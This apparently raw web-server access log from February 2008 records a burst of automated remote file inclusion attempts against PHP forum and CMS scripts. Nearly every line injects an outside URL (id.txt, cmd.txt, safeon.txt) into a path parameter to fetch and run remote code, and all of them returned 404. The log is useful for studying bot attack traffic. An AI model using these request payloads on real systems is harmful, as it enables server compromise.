85.14.221.150 - - [21/Feb/2008:07:43:49 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.150 - - [21/Feb/2008:07:43:49 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.68.186 - - [21/Feb/2008:07:43:50 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.68.186 - - [21/Feb/2008:07:43:50 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.68.186 - - [21/Feb/2008:07:43:50 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.68.186 - - [21/Feb/2008:07:43:50 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.68.186 - - [21/Feb/2008:07:43:51 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.68.186 - - [21/Feb/2008:07:43:51 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.61.90 - - [21/Feb/2008:07:43:51 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.61.90 - - [21/Feb/2008:07:43:51 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.61.90 - - [21/Feb/2008:07:43:51 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.26.178.141 - - [21/Feb/2008:07:44:07 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.26.178.141 - - [21/Feb/2008:07:44:07 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.26.178.141 - - [21/Feb/2008:07:44:08 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
161.58.27.58 - - [21/Feb/2008:07:44:08 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.27.58 - - [21/Feb/2008:07:44:09 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.17.101.27 - - [21/Feb/2008:07:44:09 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.27.58 - - [21/Feb/2008:07:44:09 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.17.101.27 - - [21/Feb/2008:07:44:09 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [21/Feb/2008:07:44:10 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.25.120.246 - - [21/Feb/2008:07:44:15 -0800] "GET /logs/access_080123.log/?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.207.123 - - [21/Feb/2008:07:44:18 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.207.123 - - [21/Feb/2008:07:44:18 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.207.123 - - [21/Feb/2008:07:44:18 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.246.23 - - [21/Feb/2008:07:44:23 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [21/Feb/2008:07:44:24 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [21/Feb/2008:07:44:24 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.89.137.99 - - [21/Feb/2008:07:44:24 -0800] "GET /logs/encapscms_PATH/core/core.php?root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [21/Feb/2008:07:44:25 -0800] "GET /encapscms_PATH/core/core.php?root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [21/Feb/2008:07:44:26 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [21/Feb/2008:07:44:26 -0800] "GET /logs/encapscms_PATH/core/core.php?root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [21/Feb/2008:07:44:26 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [21/Feb/2008:07:44:27 -0800] "GET /logs/encapscms_PATH/core/core.php?root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [21/Feb/2008:07:44:27 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [21/Feb/2008:07:44:27 -0800] "GET /encapscms_PATH/core/core.php?root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [21/Feb/2008:07:44:27 -0800] "GET /encapscms_PATH/core/core.php?root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.207.123 - - [21/Feb/2008:07:44:27 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.207.123 - - [21/Feb/2008:07:44:28 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.207.123 - - [21/Feb/2008:07:44:28 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.111.157 - - [21/Feb/2008:07:44:28 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.157 - - [21/Feb/2008:07:44:28 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.157 - - [21/Feb/2008:07:44:28 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.95.210 - - [21/Feb/2008:07:44:31 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.95.210 - - [21/Feb/2008:07:44:31 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.17.101.27 - - [21/Feb/2008:07:44:32 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.95.210 - - [21/Feb/2008:07:44:32 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.17.101.27 - - [21/Feb/2008:07:44:32 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [21/Feb/2008:07:44:32 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.26.178.141 - - [21/Feb/2008:07:44:33 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.26.178.141 - - [21/Feb/2008:07:44:33 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.26.178.141 - - [21/Feb/2008:07:44:33 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.111.157 - - [21/Feb/2008:07:44:36 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.157 - - [21/Feb/2008:07:44:36 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.157 - - [21/Feb/2008:07:44:37 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [21/Feb/2008:07:44:40 -0800] "GET /logs/access_080211.log/modules/vwar/admin/admin.php?vwar_root=http://hot.ee/jukug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [21/Feb/2008:07:44:41 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://hot.ee/jukug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [21/Feb/2008:07:44:41 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://hot.ee/jukug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [21/Feb/2008:07:44:42 -0800] "GET /logs/access_080117.log/modules/vwar/admin/admin.php?vwar_root=http://hot.ee/jukug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:44:57 -0800] "GET /logs/access_080131.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:44:57 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:44:58 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:44:58 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
74.202.241.37 - - [21/Feb/2008:07:44:59 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.241.37 - - [21/Feb/2008:07:44:59 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.241.37 - - [21/Feb/2008:07:44:59 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:44:59 -0800] "GET /logs/access_080131.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:45:00 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:45:01 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:45:01 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:45:01 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:45:02 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:45:02 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
64.76.150.198 - - [21/Feb/2008:07:45:06 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.76.150.198 - - [21/Feb/2008:07:45:06 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.76.150.198 - - [21/Feb/2008:07:45:07 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.95.210 - - [21/Feb/2008:07:45:12 -0800] "GET /logs/access_080131.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:45:13 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:45:15 -0800] "GET /logs/access_080131.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:45:17 -0800] "GET /config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.241.37 - - [21/Feb/2008:07:45:17 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.241.37 - - [21/Feb/2008:07:45:18 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.241.37 - - [21/Feb/2008:07:45:18 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:45:26 -0800] "GET /logs/config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:45:31 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:45:31 -0800] "GET /config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:45:35 -0800] "GET /logs/config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:07:45:38 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:07:45:38 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:07:45:39 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:45:51 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.16.211.62 - - [21/Feb/2008:07:45:59 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.16.211.62 - - [21/Feb/2008:07:45:59 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.16.211.62 - - [21/Feb/2008:07:45:59 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:46:01 -0800] "GET /logs/config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:46:05 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:46:06 -0800] "GET /config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:46:09 -0800] "GET /config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:46:11 -0800] "GET /logs/config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.74.40 - - [21/Feb/2008:07:46:12 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.74.40 - - [21/Feb/2008:07:46:12 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.74.40 - - [21/Feb/2008:07:46:12 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:07:46:19 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:07:46:19 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:07:46:19 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.89.74.40 - - [21/Feb/2008:07:46:21 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.74.40 - - [21/Feb/2008:07:46:21 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.74.40 - - [21/Feb/2008:07:46:21 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.27.58 - - [21/Feb/2008:07:46:24 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.27.58 - - [21/Feb/2008:07:46:24 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.27.58 - - [21/Feb/2008:07:46:24 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.123.27.136 - - [21/Feb/2008:07:46:32 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pucorp.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [21/Feb/2008:07:46:33 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pucorp.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [21/Feb/2008:07:46:35 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pucorp.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:46:53 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:47:02 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.222.47 - - [21/Feb/2008:07:47:17 -0800] "GET /logs/access_071231.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:47:21 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:07:47:27 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.116.84 - - [21/Feb/2008:07:48:05 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
